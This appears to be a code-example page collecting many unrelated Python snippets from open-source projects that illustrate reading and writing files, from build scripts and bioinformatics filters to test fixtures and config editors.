Code Example #1
File: upgrade_master.py Project: Geeglee/buildbot
def installFile(config, target, source, overwrite=False):
    with open(source, "rt") as f:
        new_contents = f.read()
    if os.path.exists(target):
        with open(target, "rt") as f:
            old_contents = f.read()
        if old_contents != new_contents:
            if overwrite:
                if not config['quiet']:
                    print("%s has old/modified contents" % target)
                    print(" overwriting it with new contents")
                with open(target, "wt") as f:
                    f.write(new_contents)
            else:
                if not config['quiet']:
                    print("%s has old/modified contents" % target)
                    print(" writing new contents to %s.new" % target)
                with open(target + ".new", "wt") as f:
                    f.write(new_contents)
        # otherwise, it's up to date
    else:
        if not config['quiet']:
            print("creating %s" % target)
        with open(target, "wt") as f:
            f.write(new_contents)
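
A minimal hypothetical invocation, assuming a buildbot-style config dict that carries at least a 'quiet' flag (the paths and keys here are illustrative, not from the original project):

config = {'quiet': False}  # hypothetical minimal config
installFile(config, 'master.cfg', 'master.cfg.sample', overwrite=False)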
Code Example #2
def fastq_filter(in_file, pos_file, neg_file, wanted):
    """FASTQ filter."""
    from Bio.SeqIO.QualityIO import FastqGeneralIterator
    handle = open(in_file, "r")
    if pos_file is not None and neg_file is not None:
        print "Generating two FASTQ files"
        positive_handle = open(pos_file, "w")
        negative_handle = open(neg_file, "w")
        print in_file
        for title, seq, qual in FastqGeneralIterator(handle):
            print("%s --> %s" % (title, clean_name(title.split(None, 1)[0])))
            if clean_name(title.split(None, 1)[0]) in wanted:
                positive_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
            else:
                negative_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
        positive_handle.close()
        negative_handle.close()
    elif pos_file is not None:
        print "Generating matching FASTQ file"
        positive_handle = open(pos_file, "w")
        for title, seq, qual in FastqGeneralIterator(handle):
            if clean_name(title.split(None, 1)[0]) in wanted:
                positive_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
        positive_handle.close()
    elif neg_file is not None:
        print "Generating non-matching FASTQ file"
        negative_handle = open(neg_file, "w")
        for title, seq, qual in FastqGeneralIterator(handle):
            if clean_name(title.split(None, 1)[0]) not in wanted:
                negative_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
        negative_handle.close()
    handle.close()
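
fastq_filter relies on a clean_name helper that is not part of this excerpt; a minimal sketch of how it might look and be called (the suffix-stripping rule and the file names are assumptions, the project's real helper may differ):

def clean_name(name):
    # hypothetical: strip a trailing /1 or /2 read-pair suffix
    return name.rsplit("/", 1)[0]

wanted = set(["read1", "read42"])  # identifiers to keep
fastq_filter("input.fastq", "matched.fastq", "unmatched.fastq", wanted)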
Code Example #3
File: recent_ra.py Project: oldhill/recent-ra
def main():

  # Get historical data from disc
  history_file = open('rarecs_log.txt', 'r')
  full_history_log = history_file.read()
  latest_historical_set = full_history_log.split('\n')[0] #first line
  history_file.close()

  # Grab latest data from residentadvisor.net/reviews.aspx?format=recommend
  current_artist = rarecommends.recommendedArtist()
  current_work = rarecommends.recommendedWork()
  current_set = current_artist+' -- '+current_work
  
  # Debug 
  print 'latest:  '+latest_historical_set
  print 'current: '+current_set

  # If there's a new set, write new history file
  if current_set != latest_historical_set:

    new_log = current_set+'\n'+full_history_log
    updated_history_file = open('rarecs_log.txt', 'w')
    updated_history_file.write(new_log)
    updated_history_file.close()
    print 'file updated!'

  else:

    print 'no updates'
Code Example #4
    def sync(self, args):
        """ Synchronize rtc/repository.yaml file and each rtc repository version hash. """
        options, argv = self.parse_args(args[:], self._print_alternative_rtcs)
        verbose = options.verbose_flag
        sys.stdout.write('# Writing repository.yaml for package distribution\n')

        sys.stdout.write('## Parsing RTC directory\n')
        package = admin.package.get_package_from_path(os.getcwd())
        repos = []
        for rtc in admin.rtc.get_rtcs_from_package(package, verbose=verbose):
            sys.stdout.write('### RTC %s\n' % rtc.rtcprofile.basicInfo.name)
            repo = admin.repository.get_repository_from_path(rtc.path, description=rtc.rtcprofile.basicInfo.description)

            repos.append(repo)

        repo_file = os.path.join(package.get_rtcpath(), 'repository.yaml')

        bak_file = repo_file + wasanbon.timestampstr()
        if os.path.isfile(bak_file):
            os.remove(bak_file)
        import shutil, yaml
        shutil.copy(repo_file, bak_file)
        dic = yaml.load(open(bak_file, 'r'))
        if not dic:
            dic = {}
        for repo in repos:
            if getattr(repo, 'url') is not None:
                url = repo.url.strip()
            else:
                url = ''
            dic[repo.name] = {'repo_name' : repo.name, 'git': url, 'description':repo.description, 'hash':repo.hash}

        yaml.dump(dic, open(repo_file, 'w'), encoding='utf8', allow_unicode=True, default_flow_style=False)
        pass
Code Example #5
def main():
    ptt_dir = '/tmp2/GorsachiusMelanolophus/ptt_posts_new/no_sponsored/'
    imgs_dir = '/tmp2/GorsachiusMelanolophus/ptt_imgs/no_sponsored/'
    start = int(sys.argv[1])
    end = int(sys.argv[2])
    fp = open('../img_num/' + str(start)+ '.txt', 'a')
    for i in range(start, end):
        try:
            post_path = ptt_dir + str(i) + '.p'
            post = pickle.load(open(post_path, 'rb'))
            url = ptt_url + post['href']
            webpage = get_webpage(url)
            imgs, blog_url = parse_post(webpage)
            if imgs:
                print(f'{i}:{len(imgs)}', file=fp)
                save(imgs, imgs_dir + str(i))
            elif blog_url:
                webpage = get_webpage(blog_url)
                imgs = get_imgs_blog(webpage)
                if imgs:
                    print(f'{i}:{len(imgs)}', file=fp)
                    save(imgs, imgs_dir + str(i))
        except KeyboardInterrupt:
            return 0
        except Exception as e:
            print(e)
Code Example #6
File: build.py Project: HLCodeTravel/titanium_flurry
def compile_js(manifest,config):
	js_file = os.path.join(cwd,'assets','sg.flurry.js')
	if not os.path.exists(js_file): return
	
	sdk = config['TITANIUM_SDK']
	iphone_dir = os.path.join(sdk,'iphone')
	sys.path.insert(0,iphone_dir)
	from compiler import Compiler
	
	path = os.path.basename(js_file)
	metadata = Compiler.make_function_from_file(path,js_file)
	method = metadata['method']
	eq = path.replace('.','_')
	method = '  return %s;' % method
	
	f = os.path.join(cwd,'Classes','SgFlurryModuleAssets.m')
	c = open(f).read()
	idx = c.find('return ')
	before = c[0:idx]
	after = """
}

@end
	"""
	newc = before + method + after
	
	if newc!=c:
		x = open(f,'w')
		x.write(newc)
		x.close()
Code Example #7
File: 01-C-exp.py Project: chw333/StanfordSGTC
def exp(inF1,inF2):
    G = Gene(inF1)
    ouFile = open(inF1 + '.exp', 'w')
    ouFile.write('Gene\tMock\tMERS\n')
    D = {}
    inFile = open(inF2)
    head = inFile.readline()
    for line in inFile:
        line = line.strip()
        fields = line.split('\t')
        gene = fields[1]
        D.setdefault(gene, [])
        #mock = (float(fields[2]) + float(fields[3]))/2
        #rsv20h = (float(fields[14]) + float(fields[15]))/2
        Mock = np.median([float(fields[2]), float(fields[3]), float(fields[4])])
        MERS = np.median([float(fields[5]), float(fields[6]), float(fields[7])])
        D[gene].append([Mock,MERS])
    inFile.close()
    for g in G:
        if g in D:
            if len(D[g]) > 1:
                #print(D[g])
                pass
            ouFile.write(g + '\t' + str(D[g][0][0]) + '\t' + str(D[g][0][1]) + '\n')
    ouFile.close()
Code Example #8
File: test_alarms.py Project: cy-lee/kiloeyes
    def setUp(self):
        self.CONF = self.useFixture(fixture_config.Config()).conf
        self.CONF.set_override('doc_type', 'fake', group='alarms')
        self.CONF.set_override('uri', 'fake_es_uri', group='es_conn')
        super(TestAlarmDispatcher, self).setUp()

        self.dispatcher_get = (
            alarms.AlarmDispatcher({}))

        self.dispatcher_get_by_id = (
            alarms.AlarmDispatcher({}))

        self.dispatcher_put = (
            alarms.AlarmDispatcher({}))

        self.dispatcher_delete = (
            alarms.AlarmDispatcher({}))

        dir_path = os.path.dirname(os.path.realpath(__file__))
        alarms_data_json = open(os.path.join(dir_path,
                                             'test_alarms_data')
                                ).read().replace('\n', '')
        self.data = json.loads(alarms_data_json)
        get_alarms_data = open(os.path.join(dir_path,
                                            'test_get_alarms_data')
                               ).read().replace('\n', '')
        self.get_alarms_data = json.loads(get_alarms_data)
Code Example #9
File: utils.py Project: hennyere/youtube-dl
def sanitize_open(filename, open_mode):
    """Try to open the given filename, and slightly tweak it if this fails.

    Attempts to open the given filename. If this fails, it tries to change
    the filename slightly, step by step, until it's either able to open it
    or it fails and raises a final exception, like the standard open()
    function.

    It returns the tuple (stream, definitive_file_name).
    """
    try:
        if filename == u'-':
            if sys.platform == 'win32':
                import msvcrt
                msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
            return (sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout, filename)
        stream = open(encodeFilename(filename), open_mode)
        return (stream, filename)
    except (IOError, OSError) as err:
        if err.errno in (errno.EACCES,):
            raise

        # In case of error, try to remove win32 forbidden chars
        # unpack the sanitized parts: os.path.join expects them as separate arguments
        alt_filename = os.path.join(*(
                        re.sub(u'[/<>:"\\|\\\\?\\*]', u'#', path_part)
                        for path_part in os.path.split(filename)))
        if alt_filename == filename:
            raise
        else:
            # An exception here should be caught in the caller
            stream = open(encodeFilename(filename), open_mode)
            return (stream, alt_filename)
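
Callers are expected to keep using the returned file name, since it may differ from the requested one; a minimal usage sketch (the payload written here is a placeholder, and encodeFilename from the same module is assumed to be in scope):

stream, real_name = sanitize_open(u'clip: part?.mp4', 'wb')
try:
    stream.write(b'downloaded bytes')  # placeholder payload
finally:
    if real_name != u'-':
        stream.close()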
Code Example #10
def copy_json(input_path, output_path):
    with open(input_path) as input:
        with open(output_path, "w+") as output:
            json.dump(
                json.load(input),
                output,
                indent=2)
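
In effect this re-serializes the JSON with two-space indentation; a hypothetical call (the file names are illustrative):

copy_json('compact.json', 'pretty.json')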
Code Example #11
File: hermes_run_script.py Project: fototo/hermes
    def consolidate_results(self):

        dicts = []
        for file in os.listdir(self.results_directory):
            if file.startswith(self.data_name + '_results_'):
                f1 = open(self.results_directory+ file, 'r')
                my_dict = eval(f1.read())
                dicts.append(my_dict)

        run_nums = [' ']
        run_nums.extend([str(r) for r in range(0,len(dicts))])

        print 'Found ' + str(len(dicts)) + ' result sets'

        full_results_loc = self.results_directory + self.data_name + '_full_results_transpose.csv'

        with open(full_results_loc, 'wb') as ofile:
            writer = csv.writer(ofile, delimiter=',')
            writer.writerow(run_nums)
            for key in dicts[0].iterkeys():
                writer.writerow([key] + [d[key] for d in dicts])

        #this file has all the info - but to bring into pandas we want to transpose the data
        df = pd.read_csv(full_results_loc, index_col=0)
        df2 = df.transpose()
        #save off the results file
        full_results_loc2 = self.results_directory + self.data_name + '_full_results.csv'
        print 'Saving: ' + full_results_loc2
        df2.to_csv(full_results_loc2, sep=',')
Code Example #12
def native_report2(src):
	data = {}
	sum = 0
	c = ""
	for root, versions, ds in os.walk(src):
		if root != src:
			continue
		for version in sorted(versions, key = str.lower, reverse = True):
			sum = 0
			data = {}
			dd = os.path.join(root, version)
			for d_version, dirs, files in os.walk(dd):
				for d in dirs:
					p = os.path.join(d_version, d) + os.sep + "*.log"
					#p = os.path.join(root, d) + os.sep + "*"
					s = len(glob.glob(p))
					sum += s
					name = os.path.join(root, d) 
					if name.startswith(src):
						name = name[len(src):]
					if name.startswith("/"):
						name = name[1:]
					#data[name] = s
					name = d_version + os.sep + name
					data[name] = s
			c += html_report(data, sum, version) + "<br/><br/>"
			#c = "<br/><br/>" + html_report(data, sum)
	open(os.path.join(src, "index.html"), "w").write(c)
Code Example #13
File: test_appliance.py Project: AJNOURI/gns3-gui
def test_check_config(tmpdir, registry):

    test_path = str(tmpdir / "test.json")

    with open(test_path, "w+", encoding="utf-8") as f:
        f.write("")

    with pytest.raises(ApplianceError):
        Appliance(registry, "jkhj")

    with pytest.raises(ApplianceError):
        Appliance(registry, test_path)

    with open(test_path, "w+", encoding="utf-8") as f:
        f.write("{}")

    with pytest.raises(ApplianceError):
        Appliance(registry, test_path)

    with pytest.raises(ApplianceError):
        with open(test_path, "w+", encoding="utf-8") as f:
            f.write('{"registry_version": 42}')
        Appliance(registry, test_path)

    Appliance(registry, "tests/registry/appliances/microcore-linux.json")
Code Example #14
	def load_text(self):
		'''
		The text of the instances is not stored in the prediction result file,
		so you need to call this function to load the texts from the testing data.

		>>> from libshorttext.analyzer import *
		>>> insts = InstanceSet('prediction_result_path')
		>>> insts.load_text()

		This method also loads the extra svm features if extra svm files
		were used when training.
		'''
		EMPTY_MESSAGE = '**None**'
		sorted_insts = sorted(self.insts, key = lambda inst: inst.idx)
		i = 0
		for idx, lines in enumerate(izip(*([open(self.filepath, 'r')] + [open(f, 'r') for f in self.extra_svm_files]))):
			line = lines[0]
			extra_svm_feats = lines[1:]
			nr_extra_svm_feats = len(extra_svm_feats)
			if idx > sorted_insts[-1].idx:
				break
			if idx == sorted_insts[i].idx:
				try:
					sorted_insts[i].text = line.split('\t',1)[1].strip()
				except:
					sorted_insts[i].text = EMPTY_MESSAGE

				sorted_insts[i].extra_svm_feats = [None] * nr_extra_svm_feats
				for j, extra_svm_feat in enumerate(extra_svm_feats):
					try:
						sorted_insts[i].extra_svm_feats[j] = dict(map(lambda t: (int(t[0]), float(t[1])), [feat.split(':') for feat in extra_svm_feat.split(None, 1)[1].split()]))
					except:
						sorted_insts[i].extra_svm_feats[j] = EMPTY_MESSAGE
				i += 1
Code Example #15
def main():
    PROG = os.path.basename(os.path.splitext(__file__)[0])
    description = """Scan claims files"""
    parser = OptionParser(option_class=MultipleOption,
                          usage='usage: %prog claims_file, claims_file, ...',
                          version='%s %s' % (PROG, VERSION),
                          description=description)
    if len(sys.argv) == 1:
        parser.parse_args(['--help'])

    args = parser.parse_args()
    p2k = {}
    k2p = {}
    try:
        with open('claimants.csv') as csv_file:
            for line in csv.reader(csv_file, dialect="excel"):
                p2k[line[0]] = line[1]
                k2p[line[1]] = line[0]
    except IOError:
        pass
    for filename in args[1]:
        with open(filename+'_masked.csv', 'wb') as cf:
            outfile = csv.writer(cf, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
            analyze_file(filename, outfile, p2k, k2p)
            print len(p2k), len(k2p)
    with open('claimants.csv', 'wb') as cf:
        cout = csv.writer(cf, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for p in p2k:
            cout.writerow([p, p2k[p]])
Code Example #16
File: pathophys_of_dz.py Project: DrLulz/AnkiFlash
def page_extract(start, end, SUBSECTION):

    PDF_IN = PdfFileReader(open(PDF_DIR, 'rb'))

#    for i in xrange(PDF_IN.numPages): # for all pages
    for i in range(int(start) - 1, int(end)):

        output = PdfFileWriter()
        output.addPage(PDF_IN.getPage(i))
        
        base, name_ext = os.path.split(PDF_DIR)
        name, ext      = os.path.splitext(name_ext)
        PDF_OUT        = '{}{}'.format(TMP_DIR, '{}-{}{}'.format(name, str(i).zfill(6), ext))
        
        with open(PDF_OUT, 'wb') as outputStream:
            output.write(outputStream)
        
        gs_pdf_to_png(PDF_OUT)
        os.remove(PDF_OUT)
    
    png_list = group(os.listdir(TMP_DIR), 2)
    for tup in png_list:
        print tup
        card_front = os.path.join(TMP_DIR, tup[0])
        card_back  = os.path.join(TMP_DIR, tup[1])
        make_cards(card_front, card_back, SUBSECTION)
Code Example #17
File: pathophys_of_dz.py Project: DrLulz/AnkiFlash
def flash_theme(name, mm):
    abspath = os.path.abspath(__file__)
    
    path  = os.path.dirname(abspath) + '/template'
    f = path + '/front.txt'
    c = path + '/css.txt'
    b = path + '/back.txt'

    with open(f, 'r') as ft, open(c, 'r') as ct, open(b, 'r') as bt:
        ftemp = ft.read()
        css   = ct.read()
        btemp = bt.read()

    m  = mm.new(name)

    fld = mm.newField('Note ID'); mm.addField(m, fld)
    fld = mm.newField('Front');   mm.addField(m, fld)
    fld = mm.newField('F Note');  mm.addField(m, fld)
    fld = mm.newField('Back');    mm.addField(m, fld)
    fld = mm.newField('B Note');  mm.addField(m, fld)
    fld = mm.newField('class');   mm.addField(m, fld)
    fld = mm.newField('Noty');    mm.addField(m, fld)
    fld = mm.newField('http');    mm.addField(m, fld)
    fld = mm.newField('video');   mm.addField(m, fld)

    m['css'] = css

    t = mm.newTemplate('Card 1')
    t['qfmt'] = ftemp
    t['afmt'] = btemp
    mm.addTemplate(m, t)
    
    mm.add(m)
    return m
Code Example #18
File: test_examples.py Project: mitocw/latex2edx
    def test_merge(self):
        testdir = path(l2emod.__file__).parent / 'testtex'
        with make_temp_directory() as tmdir:
            fn = testdir / 'example1.tex'
            print "file %s" % fn
            nfn = '%s/%s' % (tmdir, fn.basename())
            os.system('cp %s/* %s' % (testdir, tmdir))
            os.chdir(tmdir)
            l2e = latex2edx(nfn, output_dir=tmdir)
            l2e.convert()

            fn = testdir / 'example2.tex'
            print "file %s" % fn
            nfn = '%s/%s' % (tmdir, fn.basename())
            l2e = latex2edx(nfn, output_dir=tmdir, do_merge=True)
            l2e.convert()

            cfn = path(tmdir) / 'course/2013_Fall.xml'
            self.assertTrue(os.path.exists(cfn))

            self.assertIn('<chapter url_name="Unit_1"', open(cfn).read())
            self.assertIn('<chapter url_name="Unit_2"', open(cfn).read())

            cfn = path(tmdir) / 'chapter/Unit_1.xml'
            self.assertTrue(os.path.exists(cfn))

            cfn = path(tmdir) / 'chapter/Unit_2.xml'
            self.assertTrue(os.path.exists(cfn))
Code Example #19
File: main.py Project: XjCrazy09/RedditPasswords
def get_users():
    
    # each time ran, clean the user_list
    with open('user_list.txt', 'w'):
        pass
    
    count = 0

    # let's try and get a list of users some how.  
    r = praw.Reddit('User-Agent: user_list (by /u/XjCrazy09)')
    
    # check to see if user already exists.  Because if so they have already been scraped. 
    while count < 100:
        submissions = r.get_random_subreddit().get_top(limit=None)
        print "Running..."
        for i in submissions: 
            print i.author.name
            # run a tally
            count+=1 
            with open('user_list.txt', 'a') as output:
                output.write(i.author.name + "\n")
        print "Finished... \n"
        print "count: ", count
        time.sleep(5)
        
    usersList()
Code Example #20
File: combine_data.py Project: MuyMal/Hettich_lab
def createMatrix(j_range = 0 ,entry = "data"):
	# j_range = 0
	# if entry == "assigned":
	# 	j_range = 1290442
	# else:
	# 	j_range = 5425990
	if j_range == 0:
		print "You need to pass in the number of clusters as an argument to this function."
		sys.exit(1)
	with open(entry+"_collective.txt","r") as fin, open(entry+"_clust_mem_matrix.txt","w") as out_1, open(entry+"_pre_intensity_matrix.txt","w") as out_2:
		clust_matrix = [[0 for i in range(0,42)] for j in range(0,j_range)]
		int_matrix = [[0.0 for i in range(0,42)] for j in range(0,j_range)]
		fin.readline()
		for line in fin:
			line = line.split()
			clust = int(line[12].split(".")[1])
			f_index = int(line[0])/11	
			clust_matrix[clust][f_index] = clust_matrix[clust][f_index] + 1
			int_matrix[clust][f_index] = int_matrix[clust][f_index] + float(line[10])
		for i in xrange(0,42):			
			out_1.write("".join(["\t",str(i)]))
			out_2.write("".join(["\t",str(i)]))
		out_1.write("\n")
		out_2.write("\n")
		for i in xrange(0,j_range):
			for j in xrange(0,42):
				if j == 0:
					out_1.write("".join([entry,"_0_0.",str(i)]))
					out_2.write("".join([entry,"_0_0.",str(i)]))
				out_1.write("".join(["\t",str(clust_matrix[i][j])]))
				out_2.write("".join(["\t",str(int_matrix[i][j])]))
			out_1.write("\n")
			out_2.write("\n")
	return None
Code Example #21
File: address_book.py Project: Mindful/console-tools
def contacts_menu(self, args):
    address = os.path.join(self.homeRoute, 'address_book.tool')
    if not os.path.exists(address):
        address_book_init(address)
    
    cFile = open(address,'r+')
    contactsList = cFile.read().split('\n')
    cFile.close()
    
    for item in contactsList:
        if item != "":
            item = item.split(" : ")
            contacts.add(item[0], item[2], item[3], item[1])
    
    quit = False
    commands = {'view': contacts_view, 'add': contacts_add, 'help': help, 'search': contacts_find, 'remove': remove}
    while not quit:
        command = input('(Contacts): ').strip().lower()
        if command == 'exit':
            quit = True
        elif command in commands:
            commands[command](address)
        else:
            print('Error: command "' + command + '" not found.')
    
    cFile = open(address,'w')
    for item in contacts:
        cFile.write(str(item) + '\n')
    cFile.close()
Code Example #22
File: multiprocess.py Project: ikuradon/tdulogin
	def _child_main_loop(self, queue):
		while True:
			url = "http://geekhost.net/OK"
			f = urllib.urlopen(url)
			data = f.read()
			#print data
			abcPattern = re.compile(r'OK')
			if abcPattern.match(data):
				queue.put('Already logined')
			else:
				queue.put('Need login')
				LOGIN_URL = 'https://auth-wlc.ntwk.dendai.ac.jp/login.html'
				#LOGIN_URL = 'http://geekhost.net/checkparams.php'
				pd = yaml.load(open('config.yaml').read().decode('utf-8'))
				pd['buttonClicked'] = '4'
				pd['redirect_url'] = 'http://google.com/'
				pd["err_flag"] = "0" 
				pd["err_msg"] = ""
				pd["info_flag"] = "0"
				pd["info_msg"] = ""
				params = urllib.urlencode(pd)
				print repr(params)
				up = urllib.urlopen(LOGIN_URL, params)
			# after this, just sleep until the next check
			time.sleep(yaml.load(open('config.yaml').read().decode('utf-8'))['threadtime'])
Code Example #23
File: gnuplot_data.py Project: BioXiao/cgat
def PlotFit( g, data, cols=(0,1) ):

    fh1, fn1 = tempfile.mkstemp()
    a,b = cols
    os.close(fh1)
    outfile = open(fn1, "w")
    for d in data: outfile.write("%f\t%f\n" % (d[a], d[b]))
    outfile.close()
    
    parameters = {}
    fh2, fn2 = tempfile.mkstemp()
    fh3, fn3 = tempfile.mkstemp()    
    os.close(fh2)
    os.close(fh3)
    open(fn2, 'w').write('m=0\nb=0\n')
    g("f%i(x) = m * x + y0" % b) 
    g("fit f%i(x) '%s' using 1:2 via y0, m" % (b, fn1))
    g("replot f%i(x)" % (b))
    
##     g('fit m*x+b "%s" via "%s"' % (fn1, fn2) )    
##     g('update "%s" "%s"' % (fn2, fn3))
##     execfile( fn3, globals(), parameters )
##     g.replot( Gnuplot.Func( "%f*x + %f" % (parameters['m'], parameters['b']) ) )
        
    return [fn1, fn2, fn3]
Code Example #24
File: hotkeys.py Project: paucoma/samsung-tools
	def __remove_hotkey(self, command):
		""" Remove the hotkey for 'command' (and 'command' too, of course). """
		""" Return 'True' on success, 'False' otherwise. """
		self.__touch_config_file()
		oldfile = open(XBINDKEYS_CONFIG_FILE, "r")
		newfile = open(XBINDKEYS_CONFIG_FILE + ".new", "w")
		commandfound = False
		skipnextline = False
		for line in oldfile:
			if not skipnextline:
				if line != '"' + command + '"\n':
					newfile.write(line)
				else:
					commandfound = True
					skipnextline = True
			else:
				skipnextline = False
		oldfile.close()
		newfile.close()
		if commandfound:
			try:
				os.remove(XBINDKEYS_CONFIG_FILE)
			except:
				sessionlog.write("ERROR: 'Hotkeys.__remove_hotkey()' - Cannot replace '" + XBINDKEYS_CONFIG_FILE + "'.")
				os.remove(XBINDKEYS_CONFIG_FILE + ".new")
				return False
			shutil.move(XBINDKEYS_CONFIG_FILE + ".new", XBINDKEYS_CONFIG_FILE)
		else:
			os.remove(XBINDKEYS_CONFIG_FILE + ".new")
		return True
Code Example #25
File: decompiler.py Project: shomagan/cmd_py
def main():
  fb_name = open('fb_name.txt','r')
  fb_namber_to_name = fb_name.readlines()
  fb32 = open ('TESTING.fb32','rb')
  fb32_b = fb32.read()
  fb32.close()
  size_conf =(ord(fb32_b[0])<<8)|(ord(fb32_b[1]))
  size_im_conf = (ord(fb32_b[2])<<8)|(ord(fb32_b[3]))
  im_conf = fb32_b[4:4+size_im_conf]
  size_fb_conf = (ord(fb32_b[4+size_im_conf])<<8)|(ord(fb32_b[5+size_im_conf]))  
  fb_conf = fb32_b[6 + 1+ size_im_conf:6 + 1 + size_im_conf + size_fb_conf]
  im_conf_c = str_to_c(im_conf,len(im_conf))
  fb_conf_c = str_to_c(fb_conf,len(fb_conf))
  print('configuration size',size_conf)
  print('immanager size',size_im_conf)
  print('fb size',size_fb_conf)
  print(im_conf_c)
  print(fb_conf_c)
  variable = {}
  fb_runtime = {}
  fb_immanager = {}
  im_one = FB()                
#  im_one.input_variable['null'] = 0
  im_one.new_var('ones',0x12,0)
  im_one.new_var('twels',0x2,2)
  im_two = FB()
  im_two.new_var('ones',0x66,0)
  im_two.new_var('twels',0x24,2)
  print(im_two.input_variable,im_two.var_variable,im_two.out_variable) 
  print(im_one.input_variable,im_one.var_variable,im_one.out_variable)
Code Example #26
def main():
    api_url, username, password = get_account_data(True)
    backup_files = get_nsbackup_files(True)
    if 'pickle_backup_file' in backup_files.keys():
        from pickle import Pickler
    if 'json_backup_file' in backup_files.keys():
        import json
    # Instantiate the inwx class (does not connect yet but dispatches calls to domrobot objects with the correct API URL
    inwx_conn = domrobot(api_url, username, password, 'en', False)
    # get the list of all domains:
    domains = inwx_conn.nameserver.list()['domains']
    # get all the nameserver entries for each domain
    current, total = 0, len(domains)
    nsentries = dict()
    for domain in domains:
        current += 1
        domain = domain['domain']
        print "%i of %i - Currently backing up %s." % (current, total, domain)
        nsentries[domain] = inwx_conn.nameserver.info({'domain': domain})['record']
    if 'pickle_backup_file' in backup_files.keys():
        Pickler(open(backup_files['pickle_backup_file'],'wb')).dump(nsentries)
        print "Wrote backup file using Python Module Pickle : %s." % backup_files['pickle_backup_file']
    if 'json_backup_file' in backup_files.keys():
        json.dump(nsentries, open(backup_files['json_backup_file'], 'w'))
        print "Wrote backup file using Python Module JSON: %s." % backup_files['json_backup_file']
Code Example #27
File: hotkeys.py Project: paucoma/samsung-tools
	def __update_hotkey(self, command, hotkey):
		""" Update the hotkey for 'command' to 'hotkey'. """
		""" If 'command' is not found, add it with the new 'hotkey'. """
		""" Return 'True' on success, 'False' otherwise. """
		self.__touch_config_file()
		oldfile = open(XBINDKEYS_CONFIG_FILE, "r")
		newfile = open(XBINDKEYS_CONFIG_FILE + ".new", "w")
		# Search for command
		commandfound = False
		skipnextline = False
		for line in oldfile:
			if not skipnextline:
				newfile.write(line)
			else:
				skipnextline = False
			if line == '"' + command + '"\n':
				newfile.write("  " + hotkey + "\n") # update hotkey
				commandfound = True
				skipnextline = True
		if not commandfound:
			# command not found, add it
			newfile.write('"' + command + '"\n')
			newfile.write("  " + hotkey + "\n")
		oldfile.close()
		newfile.close()
		try:
			os.remove(XBINDKEYS_CONFIG_FILE)
		except:
			sessionlog.write("ERROR: 'Hotkeys.__update_hotkey()' - Cannot replace '" + XBINDKEYS_CONFIG_FILE + "'.")
			os.remove(XBINDKEYS_CONFIG_FILE + ".new")
			return False
		shutil.move(XBINDKEYS_CONFIG_FILE + ".new", XBINDKEYS_CONFIG_FILE)
		return True
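
Both __remove_hotkey and __update_hotkey assume xbindkeys' two-line entry format, in which the shell command appears in double quotes and the key combination follows on an indented line; for example (the command shown is illustrative):

"xterm -e htop"
  control+alt+t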
Code Example #28
def run_example_spark_job(work_dir, timeout=25):
    """Runs a Spark job and checks the result."""
    print 'Starting Spark job'
    stdout = open(os.path.join(work_dir, 's_stdout.txt'), 'w')
    stderr = open(os.path.join(work_dir, 's_stderr.txt'), 'w')
    register_exit(lambda: stdout.close())
    register_exit(lambda: stderr.close())

    spark = subprocess.Popen([
        os.path.join(spark_path(), 'bin/spark-submit'),
        '--master', 'mesos://%s' % MESOS_MASTER_CIDR,
        os.path.join(spark_path(), 'examples/src/main/python/pi.py'), '5'],
        stdin=None,
        stdout=stdout,
        stderr=stderr)
    register_exit(lambda: spark.kill() if spark.poll() is None else '')

    while timeout:
        if spark.poll() is not None:
            break

        time.sleep(1)
        timeout -= 1

    if timeout <= 0:
        return False

    with open(os.path.join(work_dir, 's_stdout.txt'), 'r') as f:
        result = f.read()
        return 'Pi is roughly 3' in result
Code Example #29
File: html.py Project: 89sos98/main
    def handle_finish(self):
        self.info(bold('dumping search index... '), nonl=True)
        self.indexer.prune(self.env.all_docs)
        searchindexfn = path.join(self.outdir, self.searchindex_filename)
        # first write to a temporary file, so that if dumping fails,
        # the existing index won't be overwritten
        f = open(searchindexfn + '.tmp', 'wb')
        try:
            self.indexer.dump(f, self.indexer_format)
        finally:
            f.close()
        movefile(searchindexfn + '.tmp', searchindexfn)
        self.info('done')

        self.info(bold('dumping object inventory... '), nonl=True)
        f = open(path.join(self.outdir, INVENTORY_FILENAME), 'w')
        try:
            f.write('# Sphinx inventory version 1\n')
            f.write('# Project: %s\n' % self.config.project.encode('utf-8'))
            f.write('# Version: %s\n' % self.config.version)
            for modname, info in self.env.modules.iteritems():
                f.write('%s mod %s\n' % (modname, self.get_target_uri(info[0])))
            for refname, (docname, desctype) in self.env.descrefs.iteritems():
                f.write('%s %s %s\n' % (refname, desctype,
                                        self.get_target_uri(docname)))
        finally:
            f.close()
        self.info('done')
Code Example #30
def main():

    options = get_options()
    with open(options.input) if options.input else sys.stdin as in_f, \
            open(options.output, 'w') if options.output else sys.stdout as out_f:

        serializer_cls = get_serializer(options.format)
        if not serializer_cls:
            sys.stderr.write('Unsupported format: %s\n' % options.format)
            return

        if options.human:
            serializer_cls.write_header(out_f)

        for line in in_f:
            name = line.strip()
            if not name:
                continue
            resolved = None
            try:
                resolved = resolve(name, options.single)
            except Exception as e:
                pass
            if options.parent:
                resolved = get_parents(resolved)
            out_f.write(serializer_cls.serialize_line(resolved, human=options.human, name=name))
Code Example #31
        #start fitting when the number of cases >= start
        # startNCases=100
        #how many days is the prediction
        # predict_range=150
        #weigth for fitting data
        wcases = 0.1
        wrec = 0.1
        #weightDeaths = 1 - weigthCases - weigthRecov

    optimal.append(opt.remote(country, e0, a0, r0, d0, date, version))
    version += 1

optimal = ray.get(optimal)

for i in range(0, len(countries)):
    with io.open('./results/resultOpt' + countries[i] + str(version) + '.txt',
                 'w',
                 encoding='utf8') as f:
        f.write("country = {}\n".format(countries[i]))
        f.write("S0 = {}\n".format(optimal[i][0][0]))
        f.write("Delta Date Days = {}\n".format(optimal[i][0][1]))
        f.write("I0 = {}\n".format(optimal[i][0][2]))
        f.write("wCases = {}\n".format(optimal[i][0][3]))
        f.write("wRec = {}\n".format(optimal[i][0][4]))
        f.write("Function Minimum = {}\n".format(optimal[i][1]))

    stdoutOrigin = sys.stdout
